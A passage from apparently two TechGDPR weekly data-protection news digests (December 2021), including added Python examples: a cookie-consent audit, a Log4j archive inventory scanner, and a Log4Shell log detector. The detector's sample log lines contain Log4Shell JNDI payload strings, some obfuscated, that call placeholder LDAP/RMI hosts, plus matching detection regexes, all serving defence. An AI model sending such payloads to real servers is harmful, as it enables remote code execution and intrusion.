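@dataclass(frozen=True)
class Finding:
    rule: str      # which CNIL finding the observation matches
    cookie: str    # cookie name, or "-" for banner-level findings
    detail: str


def audit_session(events, banner):
    """events: chronological (step, kind, cookie_name) tuples, where kind is
    'set' for an observed Set-Cookie or document.cookie write, and 'accept'
    or 'refuse' for the user's choice in the banner (cookie_name is None).
    banner: how many clicks each choice takes in the consent UI."""
    findings = []
    consent = None  # None = no choice yet, True = accepted, False = refused
    for step, kind, name in events:
        if kind in ("accept", "refuse"):
            consent = kind == "accept"
            continue
        if kind != "set" or name in ESSENTIAL:
            continue
        if consent is None:
            findings.append(Finding("placed-before-choice", name, f"step {step}"))
        elif consent is False:
            findings.append(Finding("placed-after-refusal", name, f"step {step}"))
    # Refusing must be as easy as accepting: same number of clicks.
    if banner["refuse_clicks"] > banner["accept_clicks"]:
        findings.append(Finding(
            "refuse-harder-than-accept", "-",
            f"accept takes {banner['accept_clicks']} click(s), "
            f"refuse takes {banner['refuse_clicks']}"))
    return findings


# Constructed session: the first page load drops an analytics cookie before
# the banner has been answered, the user refuses (three clicks deep in a
# settings panel), and an advertising cookie is still dropped afterwards.
SAMPLE_EVENTS = [
    (1, "set", "session_id"),
    (1, "set", "_ga"),
    (2, "refuse", None),
    (3, "set", "consent_choice"),
    (3, "set", "_fbp"),
]
SAMPLE_BANNER = {"accept_clicks": 1, "refuse_clicks": 3}


def run_sample():
    return audit_session(SAMPLE_EVENTS, SAMPLE_BANNER)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.rule:28} {f.cookie:16} {f.detail}")
```

In practice the event list comes from a browser automation run (one pass that refuses, one that accepts) with the cookie jar diffed after each step; the audit logic above is the same.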

In Germany, the Saxony-Anhalt data protection commissioner published a guide for small and medium-sized companies (in German only). Craftsmen, merchants and freelancers in many industries collect, store and use personal data about customers, employees or suppliers, often in a variety of ways, and must comply with data protection law. The State Commissioner has long received numerous inquiries from such companies, for example:

  • What customer or employee data is a company allowed to collect?
  • How long may the data be stored?
  • What should be done when customers exercise their data protection rights, or when employee data has been encrypted in a cyber attack?

Answers to these and many other typical questions are provided in the newly published guide. Read the full text here.

The Belgian data protection authority published its final recommendation on the use of biometrics (in French and Dutch). Biometric data is a special category of personal data (Art. 9 GDPR), so its processing is prohibited in principle unless a specific derogation applies: either the explicit consent of the data subject or necessity for reasons of substantial public interest. Since there is currently no norm in Belgian law that authorises the processing of biometric data for the authentication of individuals, such processing is being performed without a legal basis wherever explicit consent cannot be invoked. Other key takeaways are:

  • it is important to consider whether the performance of a contract or the provision of a service is made conditional on consent being given;
  • consent is presumed not to be “freely given” in particular in employer-employee relationships and where a product or service holds a (quasi-)monopoly in the market;
  • the purpose limitation, data minimisation and proportionality principles are particularly important for the processing of biometric data;
  • data protection impact assessments will generally be required;
  • no transition period is provided for companies.

Opinion: What if your boss was an algorithm?

Privacy International and its partners have teamed up to challenge the unprecedented surveillance that gig economy workers face from their employers. They filed over 500 data subject access requests (DSARs) with seven companies – Amazon Flex, Bolt, Deliveroo, Free Now, Just Eat, Ola and Uber – and interviewed gig workers. According to their report, several gig economy employers seem reluctant to comply fully with their data protection obligations. The investigation was unable to obtain information about how algorithms calculate the score used to prioritise the dispatch of journeys to drivers, and some companies failed to provide the guidance documents or the location data they gather. Finally, the report shows that surveillance is not just vast data collection but also the use of more invasive technologies: it gives specific examples where facial recognition technology locked drivers out of their accounts after identity verification failures.

Data security: Log4j follow up

The EU Commission, the EU Agency for Cybersecurity (ENISA), CERT-EU and the network of the EU’s national computer security incident response teams have been closely following the development of the Log4Shell vulnerability since 10 December. It is a flaw in the widely used open-source Java logging library Log4j, maintained by the Apache Software Foundation and embedded in a wide array of applications and web services across the globe. Given the nature of the vulnerability, the library’s ubiquity and the complexity of patching in some affected environments, all organisations, especially entities falling under the Network and Information Security (NIS) Directive, should assess their potential exposure as soon as possible. The latest recommendations so far can be found in:
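Assessing exposure starts with knowing where Log4j actually is, which is harder than it sounds because the library usually ships inside other archives. The script below is an added example, not a tool from the Commission, ENISA or CERT-EU: it inventories log4j-core inside JAR, WAR and EAR files (recursing into archives nested in archives, as in a WAR’s WEB-INF/lib), reads the version from the bundled manifest and records whether JndiLookup.class, the class the exploit relies on, is still present. The fixtures it builds are constructed stand-ins with no real bytecode, and the cutoff used to label a JAR “patched” (2.17.1, the release after the Log4Shell-family fixes for CVE-2021-44228 and its follow-ups) is the example’s own assumption.

```python
"""Inventory Log4j 2 inside JAR/WAR/EAR archives and classify Log4Shell
exposure. Added example, not Commission/ENISA/CERT-EU tooling."""
import io
import os
import re
import tempfile
import zipfile

CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE_PREFIX + "lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Assumption used for "patched": first 2.x release after the Log4Shell-family
# fixes (CVE-2021-44228 and its follow-ups).
FIXED = (2, 17, 1)
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if absent."""
    m = VERSION_RE.search(text or "")
    return tuple(int(g) if g else 0 for g in m.groups()) if m else None


def manifest_version(zf):
    """Implementation-Version from the archive's manifest, if any."""
    try:
        raw = zf.read(MANIFEST).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in raw.splitlines():
        if line.lower().startswith("implementation-version:"):
            return parse_version(line.split(":", 1)[1])
    return None


def classify(version, has_jndi):
    if version is None:
        return "unknown-version"
    if version >= FIXED:
        return "patched"
    # Deleting JndiLookup.class was the published stopgap where upgrading
    # was not immediately possible.
    return "vulnerable" if has_jndi else "mitigated-jndilookup-removed"


def scan_archive(data, path, results):
    """Inspect archive bytes; record (path, version, status) for log4j-core
    and recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if any(n.startswith(CORE_PREFIX) for n in names):
            version = manifest_version(zf)
            results.append((path, version, classify(version, JNDI_CLASS in names)))
        for n in names:
            if n.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(n), f"{path}!/{n}", results)


def scan_tree(root):
    results = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, results)
    return results


def _fake_log4j_core(version, with_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar (no real bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(CORE_PREFIX + "Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_sample_tree(root):
    """Fixtures: an old core JAR, a patched one, and a WAR bundling an old
    core JAR from which JndiLookup.class was deleted."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib, exist_ok=True)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.14.1"))
    with open(os.path.join(lib, "log4j-core-2.17.1.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.17.1"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar",
                    _fake_log4j_core("2.14.1", with_jndi=False))
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(war.getvalue())


def scan_sample():
    """Build the fixtures in a temp dir; return sorted relative rows."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sorted((os.path.relpath(p, tmp), v, s) for p, v, s in scan_tree(tmp))


if __name__ == "__main__":
    for path, version, status in scan_sample():
        shown = ".".join(map(str, version)) if version else "?"
        print(f"{status:30} {shown:8} {path}")
```

Point `scan_tree` at an application server’s deployment directory to get the real inventory; the manifest version is only as trustworthy as the build that produced it, so a JAR with no manifest is reported as unknown rather than assumed safe.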

Big Tech: E2EE, “buy-now, pay-later”, 5G smart factories, smartphone duopoly

Microsoft is rolling out end-to-end encryption (E2EE) support for Microsoft Teams, the Verge reports. After announcing the feature earlier this year and running a public preview since October, Teams is getting E2EE for all one-to-one calls. Teams’ standard protection encrypts data in transit and at rest but allows authorised Microsoft services to decrypt content server-side; with E2EE, the call content can be decrypted only on the two participants’ devices. Microsoft also uses SharePoint encryption to secure files at rest and OneNote encryption for notes stored in Teams, and all chat content in Teams is encrypted in transit and at rest.

US telecom giant Verizon has signed a deal with Alphabet’s Google Cloud to combine its 5G network with Google’s computing power to offer services such as autonomous robots and smart factories, Reuters says. Telecom companies have been partnering with technology firms to automate businesses and factories, lowering costs and speeding up data traffic through private 5G networks that do not compete for bandwidth with other users of a public network. Verizon has also struck private 5G deals in several countries and has partnered with other cloud operators such as Microsoft Azure and Amazon’s AWS. Reportedly, “a camera attached to an autonomous mobile robot will scan packages to maintain inventory and using computer vision, the robot will send details over 5G to an inventory management system, providing real-time analytics”, the companies said.

The US Consumer Financial Protection Bureau (CFPB) asked five “buy-now, pay-later” companies – Affirm, Afterpay, Klarna, PayPal and Zip Co – for information on their business practices, amid concerns that these financial products are putting consumers and their data at risk. The CFPB is concerned about “accumulating debt, regulatory arbitrage, and data harvesting” and is seeking data on the risks and benefits of the products. By way of illustration, a recent survey by the personal finance company Credit Karma found that one third of US consumers who had used “buy-now, pay-later” services had fallen behind on one or more payments, and 72% of those said their credit scores had declined.

Apple and Google have a “vice-like grip” on people’s mobile phones, and their duopoly should be investigated by the proposed new regulator, the UK’s competition authority, the CMA, has said. The two companies effectively control users’ mobile phone experience in the UK, with their operating systems installed on 99.45% of all phones in the country: “Once a consumer buys a phone they are essentially wedded to the ecosystem of one of the two companies – Apple’s App Store or Google’s Play Store and their respective web browsers Safari or Chrome”. The new Digital Markets Unit (DMU), which will be part of the CMA, has been set up in shadow form until the government formally grants it regulatory powers. The DMU will enforce a code of conduct that the tech giants must follow when dealing with rivals and third parties. The code will apply only to companies deemed to have strategic market status, although no tech firm has officially been given that status yet, the Guardian reports.

The post Weekly digest December 13 – 19, 2021: Grindr’s privacy fine, guide for SMEs and developers, 5G smart factories appeared first on TechGDPR.

Weekly digest December 6 – 12, 2021: whistleblowers, gig-workers, cookiebots, software flaws, DPIA for AI https://techgdpr.com/blog/weekly-digest-13122021-whistleblowers-data-protection-gig-workers-cookiebots-software-flaws-dpia-for-ai/ Mon, 13 Dec 2021 09:52:31 +0000

TechGDPR’s review of international data-related stories from press and analytical reports.

Legal processes and redress

The EU Whistleblowing Directive is due to be implemented into national law by 17 December. It requires all EU Member States to pass legislation obliging all companies with 50 or more workers to put in place appropriate reporting channels, enabling those workers to report breaches of EU law, and to ensure that those who make whistleblowing reports are legally protected against retaliation for doing so. Businesses with operations across the EU need to monitor implementation and understand the local requirements, including any set by the data protection authorities, as there will be variations between jurisdictions (see the country-by-country implementation tracker from Bird & Bird LLP). Key areas to address will be ensuring that:

  • reports are handled by the correct people, in accordance with prescribed timescales and with appropriate security and confidentiality;
  • required information is given to the whistleblower and to the person investigated;
  • there is guidance and training in place to ensure non-retaliation; and 
  • there are appropriate retention periods for reports and investigation data. 

How this could be implemented in practice (using Germany as the example), involving works councils, internal codes of conduct, reporting options and controls, is set out in an article by Ius Laboris lawyers.

Uber, Deliveroo and a dozen other two-sided online platforms could be hit by draft EU rules for gig workers: under a new proposal from the EU Commission meant to boost workers’ social rights, they may have to reclassify some of their workers as employees. The rules apply to ride-hailing and food delivery apps and the like, and require companies to tell workers how their algorithms are used to monitor and evaluate them, allocate tasks and set fees. Workers can also demand compensation for breaches, Reuters reports. The rules place the burden on online platforms to prove that the rules do not apply to them, and workers can challenge their classification either through an administrative process or in court. The draft rules will need to be thrashed out with EU member states and EU lawmakers before they can be adopted, with the Commission estimating a 2025 time frame.

In Germany, the administrative court of Wiesbaden issued a preliminary decision prohibiting RheinMain University from using Cybot A/S’s consent management platform, Cookiebot by Usercentrics, DataGuidance reports. In particular, the court found that:

  • the Cookiebot CMP transfers the complete IP address of the end user to the servers of a cloud company headquartered in the US;
  • the end user was identifiable from the combination of a key stored in the user’s browser, which identified the website visitor, and the transferred full IP address;
  • this constituted a transfer of personal data to a third country, which is prohibited in line with the CJEU’s “Schrems II” judgment.

Even where the server itself is located in the EU, the US company has access to it, so the US CLOUD Act, with its broad powers for US authorities to demand data, applies. Finally, the university did not ask users for consent to the transfer, users were not informed about the risks arising from the US CLOUD Act, and the transfer was not necessary for the operation of the university’s website.

Official guidance

In Austria, a newly approved Code of Conduct (available in German only) gives insurance brokers and consultants more legal certainty. The document, approved by the data protection authority under Art. 40 GDPR, finally clarifies the legal status of the insurance broker as a data controller who acts independently in the customer’s interest and is not subject to data protection instructions from an insurance company. It also brings clarity on the legal justification for processing both “simple” and “special” categories of personal data. An advantage for all those who formally adhere to the Code is an objective external monitoring body entrusted with checking compliance.

Data breaches, investigations and enforcement actions

The Dutch data protection authority, the AP, imposed a fine of 2.75 million euros on the tax administration. For years it processed the dual nationality of applicants for childcare allowance in an unlawful, discriminatory and improper manner. Dual nationality plays no role in assessing an application for childcare allowance, yet the tax administration kept and used this information. It also used applicants’ nationality as an indicator for combating organised crime in a system that automatically flagged certain applications as high-risk. The data was not necessary for these purposes and should have been deleted under the GDPR’s data minimisation principle. The tax administration stopped using these indicators in 2018, and by 2020 the dual nationalities of Dutch people had been completely removed from its systems.

The UK Information Commissioner’s Office (ICO) fined broadband ISP and TV operator Virgin Media 50,000 pounds after it sent nearly half a million direct marketing emails to people who had previously opted out. In August 2020 the regulator received a complaint from one of the operator’s customers about an unsolicited email: the message took the form of a price notification and tried to get the customer to opt back in to marketing communications. Just one customer complained to the ICO, but that was enough to prompt an investigation. Even though 6,500 customers opted back in to marketing emails as a result of the mailshot, the ICO said this did not excuse the breach of the UK’s Privacy and Electronic Communications Regulations (PECR). “The fact that Virgin Media had the potential for financial gain from its breach of the regulation (by signing up more clients to direct marketing) is an aggravating factor”, the ICO stated.

The Norwegian data protection authority, Datatilsynet, imposed an infringement fee of 99,000 euros on the Government Pension Fund (SPK). SPK had collected unnecessary income information about approximately 24,000 people. It had obtained income data from the tax administration since 2016 and itself disclosed that part of the data should not have been collected, as it was not necessary for the post-settlement of disability benefits. The information arrived as a predefined data set from the tax authority, and until 2019 SPK had no routines for reviewing and deleting the surplus information, violating basic data processing principles, including those governing special categories of personal data.

Artificial Intelligence

More and more companies will become engaged in developing and building AI systems, and in using AI systems already deployed, so potentially all companies will sooner or later need to deal with the legal issues around accountability for AI systems, says an analysis by Bird & Bird LLP. One of these accountability requirements will often be the need to conduct a Data Protection Impact Assessment (DPIA). DPIAs for AI systems differ from assessments of the development and deployment of conventional software because of peculiarities inherent in how AI systems work. The main points to consider are:

  • distinguishing between DPIAs for AI system development or enhancement (e.g. training the algorithm) and for AI system deployment in production (e.g. candidates’ CVs being rejected on the basis of the historical data fed into the algorithm);
  • taking a precise, technology-neutral approach to capturing the essential characteristics of AI (e.g. systems aiming to resemble intelligent behaviour through methods of reasoning, learning, perception, prediction, planning or control).

The most important aspects of a DPIA for AI system development or enhancement include: controllership, purpose limitation, purpose alteration, necessity, statistical accuracy, data minimisation, transparency, individual rights, and a data security risk assessment. Data controllers (providers of the AI system or the customers deploying it) may also voluntarily decide to conduct DPIAs as an appropriate measure to strengthen their accountability and safeguard data subjects’ rights. This may ultimately also help to win customer trust and maintain a competitive edge.

Opinion

The Guardian publishes thoughts by Timnit Gebru, a former co-leader of Google’s Ethical AI team:

“When people ask what regulations need to be in place to safeguard us from the unsafe uses of AI we’ve been seeing, I always start with labor protections and antitrust measures. I can tell that some people find that answer disappointing – perhaps because they expect me to mention regulations specific to the technology itself.” In her opinion, the incentive structure must be changed to prioritize citizens’ well-being. To achieve that, “an independent source of government funding to nourish independent AI research institutes is needed, that can be alternatives to the hugely concentrated power of a few large tech companies and the elite universities closely intertwined with them.”

Individual rights

The monitoring of workers’ personal data via entrance control systems is the subject of an article on the Social Europe website. In tracking entry to and exit from the workplace and ensuring its safety, electronic access control systems that hold only limited, non-sensitive data about workers will comply with the legal instruments better than biometric systems. Biometric access control should therefore be a last resort, limited to exceptional areas that require high security or where highly confidential information is kept. As the article sums up, the GDPR does not directly regulate the monitoring of workers by electronic and biometric access control systems; the relevant provisions can be found in specific national legislation, in the Council of Europe’s Recommendation CM/Rec(2015)5 on the processing of personal data in the context of employment, and in Opinion 2/2017 of the Article 29 Working Party.

Data security

How do SIM swapping attacks work, and what can you do to protect yourself? The European Union Agency for Cybersecurity, ENISA, has taken a technical deep dive into the subject. Since 2017 such attacks have mostly targeted banking transactions, but also cryptocurrency, social media and email accounts. In a SIM swapping attack, the attacker convinces the telecom provider to move the victim’s number onto a SIM the attacker controls, using social engineering: pretending to be the real customer and claiming, for example, that the original SIM card is damaged or lost. Once the number has been moved, SMS-based one-time codes and account recovery messages are delivered to the attacker, which is what makes the attack valuable against accounts that rely on SMS as a second factor. Specific circumstances that open the door to attackers include:

  • weak customer authentication processes;
  • negligence or a lack of cyber training or hygiene;
  • a lack of risk awareness.

More information for the public is available in the ENISA Leaflet “How to Avoid SIM-Swapping”.

How long would it take a computer to crack your password? The latest chart on the Statista website illustrates that a password of 8 lowercase letters has about 209 billion possible combinations (26^8), a keyspace that modern cracking hardware can exhaust almost instantly. Mixing in a single upper case letter changes the picture dramatically, extending the time to 22 minutes, because the chart then assumes every position could hold any of 52 characters rather than 26. A long mix of upper and lower case letters, symbols and numbers is the best way to make a password more resistant: a 12-character password containing at least one upper case letter, one symbol and one number would take 34,000 years to crack. Note that such figures assume pure brute force at an assumed guess rate against a fast hash; a password made of dictionary words, or one that appears in a leaked password list, falls far faster regardless of its length.

Big Tech

Twitter is reviewing a controversial policy that penalises users who share images of other users without their consent, the Guardian reports. The company launched an internal review after making several errors in enforcing the policy. The platform now allows users to report others who tweet “private media that is not available elsewhere online as a tool to harass, intimidate, and reveal the identities of individuals”; if a review concludes that the complaint has merit and the image was not used for a journalistic or public interest purpose, the offending account is deactivated. Some activists say the breadth of the new rules makes them ineffective and ripe for abuse against the most vulnerable groups, while some reporters, photographers and journalists worry that the rules ignore the absence of a reasonable expectation of privacy in public spaces and would undermine “the ability to report newsworthy events by creating nonexistent privacy rights”.

A Virginia federal court granted Microsoft’s request to seize 42 US-based websites run by a Chinese hacking group, IAPP reports. Microsoft, which has tracked the group known as Nickel since 2016, is redirecting the sites’ traffic to secure Microsoft servers to “protect existing and future victims”. Microsoft’s Corporate Vice President of Customer Security and Trust said Nickel targeted organisations in 29 countries, using collected data “for intelligence gathering from government agencies, think tanks, universities and human rights organizations”.

Several Amazon services – including its website, Prime Video and applications that use Amazon Web Services (AWS) – went down last week for thousands of users in the US and EU. Amazon’s Ring security cameras, the mobile banking app Chime and the robot vacuum cleaner maker iRobot were also affected. Amazon said the outage was probably due to problems related to its application programming interfaces (APIs), the interfaces through which applications integrate with AWS services. The huge trail of damage from a problem in a single region, “US-EAST-1”, underscored how difficult it is for companies to spread their cloud computing across regions and providers, Reuters reports. With 24% of the overall market, according to research firm IDC, Amazon is the world’s biggest cloud computing firm, and rivals such as Microsoft, Alphabet’s Google and Oracle are trying to lure AWS customers to use parts of their clouds, often as a backup.

Russia has blocked the popular privacy service Tor, ratcheting up its control of the internet, Reuters reports. Russia has exerted increasing pressure on foreign tech companies this year over content shared on their platforms and has also targeted virtual private networks (VPNs) and other online tools. The Tor anonymity network routes traffic through a chain of relays so that a user’s IP address, and therefore identity, is hidden from the sites they visit; it also provides access to the so-called “dark web”. Tor, which says its mission is to advance human rights and freedoms, has more than 300,000 users in Russia, or 14% of all daily users, second only to the US.

A recently uncovered software flaw could be the “most critical vulnerability of the last decade”, the Guardian reports. The vulnerability, dubbed “Log4Shell”, was found in Log4j, an open-source logging library from the Apache Software Foundation that is ubiquitous in websites and web services. It was reported to Apache by Alibaba on 24 November and disclosed by Apache on 9 December. It allows attackers to execute code on affected servers without any authentication, giving them access to internal systems and databases. Log4j is standard kit in cloud servers and enterprise software across business and government, and few computer skills are needed to exploit the bug to steal or destroy data or install malware. It will be days before the full extent of the damage is known.
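The Log4Shell passages in this digest and in the 13–19 December one above describe a bug triggered simply by getting a crafted string logged, so the first detection most teams built was a search of request logs for the lookup syntax. The following added example (not code from Apache or any of the quoted sources) does that over constructed Apache-style access log lines and, unlike a plain “${jndi:” grep, first URL-decodes and collapses the `${lower:…}`, `${upper:…}` and `${…:-…}` lookups that attackers nested to hide the keyword. The sample lines use documentation IP ranges, and the subset of lookups handled is the example’s own choice; real Log4j supports more.

```python
"""Flag Log4Shell exploitation attempts in web server logs, including the
obfuscated forms used to dodge naive '${jndi:' matching. Added example."""
import re
from urllib.parse import unquote

# Innermost ${...} with no nested braces inside.
INNER = re.compile(r"\$\{(?P<body>[^${}]*)\}")
# After normalisation the payload looks like ${jndi:<proto>://<host>...}.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<proto>[a-z]+)://(?P<host>[^/:}\s]+)", re.I)


def resolve_inner(body):
    """Evaluate one innermost lookup the way Log4j would, for the lookups
    attackers used to assemble 'jndi' from fragments. The jndi lookup itself
    and unknown lookups are left untouched so the caller can stop."""
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "jndi":
        return "${" + body + "}"
    if ":-" in body:                    # ${env:NOPE:-j} and ${::-j} -> 'j'
        return body.split(":-", 1)[1]
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return "${" + body + "}"


def normalize(text, max_rounds=20):
    """Repeatedly URL-decode and collapse innermost lookups until stable."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded != text:
            text = decoded
            continue
        collapsed = INNER.sub(lambda m: resolve_inner(m.group("body")), text)
        if collapsed == text:
            return text
        text = collapsed
    return text


def scan_logs(lines):
    """One hit per line that contains a JNDI lookup after normalisation."""
    hits = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append({"line": number, "proto": m.group("proto").lower(),
                         "host": m.group("host"), "normalized": norm})
    return hits


# Constructed access log lines: a plain payload in the User-Agent, one built
# from ${lower:} fragments, one URL-encoded in the query string using the
# ${::-x} default trick, and a benign line with template-looking syntax.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:L}dap://203.0.113.9/x}"',
    '198.51.100.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.10%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:05 +0000] "GET /docs?price=${amount} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['proto']}://{hit['host']}  <- {hit['normalized']}")
```

The callback hosts it extracts are the attacker’s LDAP or RMI servers, which is what you want for blocking and for correlating against outbound connection logs; a hit in the log only proves the string was received, and a vulnerable server would have shown a matching outbound connection to that host.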

The post Weekly digest December 6 – 12, 2021: whistleblowers, gig-workers, cookiebots, software flaws, DPIA for AI appeared first on TechGDPR.
